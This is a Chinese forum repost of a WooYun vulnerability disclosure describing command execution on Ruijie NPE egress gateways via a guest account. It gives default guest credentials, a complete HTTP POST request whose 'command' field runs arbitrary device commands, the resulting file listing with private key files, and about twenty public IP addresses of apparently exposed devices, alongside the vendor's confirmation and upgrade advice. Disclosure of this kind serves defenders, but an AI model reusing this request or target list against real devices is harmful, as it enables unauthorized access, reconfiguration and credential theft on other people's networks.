锐捷NPE出口网关任意操作的命令执行

linda

琳达

版主

Rank: 7 Rank: 7 Rank: 7

发短消息
加为好友
当前离线

1^# 大中小发表于 2016-1-12 10:29 只看该作者

锐捷NPE出口网关任意操作的命令执行

漏洞概要
缺陷编号： WooYun-2015-123851
漏洞标题：锐捷NPE出口网关任意操作的命令执行

相关厂商：       ruijie.com.cn
漏洞作者：       路人甲
提交时间：       2015-07-01 10:39
公开时间：       2015-09-29 17:52
漏洞类型：       非授权访问
危害等级：       高
自评Rank：       15
漏洞状态：厂商已经确认
漏洞来源：       http://www.wooyun.org
Tags标签：设计缺陷/边界绕过

漏洞详情披露状态：
2015-07-01：       细节已通知厂商并且等待厂商处理中
2015-07-01：       厂商已经确认，细节仅向厂商公开
2015-07-04：       细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航）
2015-08-25：       细节向核心白帽子及相关领域专家公开
2015-09-04：       细节向普通白帽子公开
2015-09-14：       细节向实习白帽子公开
2015-09-29：       细节向公众公开

简要描述：锐捷NPE出口网关任意操作的命令执行
详细说明：厂商：锐捷网络

产品名称：NPE网络出口引擎

官网：http://www.ruijie.com.cn/

关键字：title:锐捷网络 --NPE网络出口引擎--登录界面

列举了部分：

http://223.220.248.3/index.htm

http://221.213.54.66/index.htm

http://219.139.148.126/index.htm

http://60.19.64.146/index.htm

http://125.67.7.2/index.htm

http://202.103.10.214/index.htm

http://58.18.131.200/index.htm

http://175.174.62.25/index.htm

http://58.254.92.130/index.htm

http://58.18.163.190/index.htm

http://117.132.9.226/index.htm

http://119.255.22.13/index.htm

http://211.154.11.246/index.htm

http://221.203.77.234/index.htm

http://120.209.15.197:8888/index.htm

http://61.131.82.228:8080/index.htm

http://221.202.167.17:8080/index.htm

http://202.115.254.26/index.htm

http://1.30.21.42/index.htm

http://218.65.220.99:9090/index.htm

系统自身存在的用户有：admin、manager、guest。guest的默认账号是guest，

一个正常的guest用户登陆后的cookie是这样的：

Cookie: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; c_name=; hardtype=NPE60E; web-coding=gb2312; currentURL=1.1

之前出现越权登陆之后，锐捷将guest的账户页面仅可查看当前状态，前台是无法进行任何操作的。但是问题是，前台的可视化显示是通过直接调用命令进行展示，调用命令的时候，是没有进行任何的权限认证的，从而导致了任意代码执行。

这里以http://221.213.54.66/index.htm为例：

前台会调用各种系统命令，如端口状态、CPU状态等等

这里以其中的一条后台请求为例：

code 区域POST /WEB_VMS/LEVEL15/ HTTP/1.1
Accept: */*
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Referer: http://221.213.54.66/cache.htm
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: 221.213.54.66
Content-Length: 73
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; c_name=; hardtype=NPE60E; web-coding=gb2312; currentURL=1.1

command=show%20clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.

其中command可控，直接执行各种敏感命令均可！

如查看版本信息：

配置信息：

控制台用户密码：

当然也可以重启、恢复出厂默认、更改各项配置等等。

不仅如此，还可以获取系统任意信息及文件。

如：获取系统文件：

code 区域Mode Link    Size             MTime Name<OPTION>
-------- ---- --------- ------------------- ------------------<OPTION>
<DIR> 1       0 1970-01-01 08:00:00 dev/<OPTION>
<DIR> 2       0 2011-07-20 22:53:09 mnt/<OPTION>
<DIR> 1       0 2015-06-09 08:46:13 ram/<OPTION>
<DIR> 2       0 2015-01-07 00:11:07 tmp/<OPTION>
<DIR> 0       0 1970-01-01 08:00:00 proc/<OPTION>
         1 239730 1970-01-01 08:02:49 ucs_gb.db <OPTION>
         1 915556 2012-07-26 08:31:33 signature.db <OPTION>
         1       34 2015-06-12 08:34:30 update_list.txt <OPTION>
         1    410 2012-07-26 08:32:49 file_list.txt <OPTION>
         1  13652864 2014-09-02 17:47:14 rgos4b8R144358.bin <OPTION>
         1 2255101 1970-01-01 08:02:52 lb-route-choose.db <OPTION>
         1    424 2011-10-11 22:52:59 rsa_private.bin <OPTION>
<DIR> 4       0 2012-12-11 08:17:47 pkistore/<OPTION>
         1    696 2015-01-06 22:56:47 httpd_cert.crt <OPTION>
         1    25769 1970-01-01 08:02:52 fc_template.txt <OPTION>
         1 2200856 2015-06-04 08:35:08 app_sub_1.db <OPTION>
         1 124840 2015-06-04 08:35:14 app_sub_2.db <OPTION>
         1    688 2015-06-04 08:35:14 app_sub_3.db <OPTION>
         1    30023 2014-09-02 16:46:04 config20140902.text <OPTION>
         1    8891 2015-01-08 09:15:29 signature_content.db <OPTION>
         1    887 2015-01-06 22:56:47 httpd_key.pem <OPTION>
         1  14667776 1970-01-01 08:02:24 rgos.bin <OPTION>
         1       82 2014-05-05 17:20:57 tcp_close_trace.text <OPTION>
         1 150740 1970-01-01 08:02:48 ucs_big5.db <OPTION>
         1    4936 2015-05-04 16:04:57 config.text <OPTION>
         1    5273 2015-01-08 09:15:29 feedback.txt <OPTION>
         1    56882 2015-04-18 08:34:40 route-choose.db <OPTION>
<DIR> 5       0 2008-08-09 11:23:24 portal/<OPTION>
         1    424 2011-10-11 22:52:59 rsa1_private.bin <OPTION>
<DIR> 2       0 2015-06-12 08:50:24 feedback/<OPTION>
<DIR> 2       0 2015-06-04 08:35:05 app_tmp/<OPTION>
         1  14667776 1970-01-01 08:01:59 rgos.bin.bak <OPTION>
         1 8978272 2015-01-10 08:39:54 web_management_pack.upd <OPTION>
         1    390 2015-06-04 08:35:04 app_file_list.txt <OPTION>
<DIR> 2       0 2012-12-11 11:29:56 user_auth/<OPTION>
         1    42496 1970-01-01 08:00:32 portal_pack.upd <OPTION>
         1    3275 2011-10-01 23:47:17 config.text.ord <OPTION>
<DIR> 2       0 2015-06-10 08:34:23 http_update/<OPTION>
--------------------------------------------------------------<OPTION>
27 Files (Total size 58035091 Bytes), 11 Directories.<OPTION>
Total 535822336 bytes (511MB) in this device, 448499712 bytes (427MB) available.<OPTION>

漏洞证明：如上！

修复方案：如上！

版权声明：转载请注明来源路人甲@乌云

漏洞回应
厂商回应：
危害等级：低
漏洞Rank：1
确认时间：2015-07-01 17:50
厂商回复：修复方案：
设备软件版本升级到最新版即可
最新状态：2015-07-02：已经在官网，提供解决漏洞的新版本供下载。并且每次发布新版本后，设备上的web都会有一次提示更新，请根据提示升级。
原文：http://www.wooyun.org/bugs/wooyun-2015-0123851

搜索更多相关主题的帖子: 锐捷 NPE 非授权访问远程命令执行锐捷 NPE 非授权访问远程命令执行

TOP

‹‹ 上一主题 | 下一主题 ››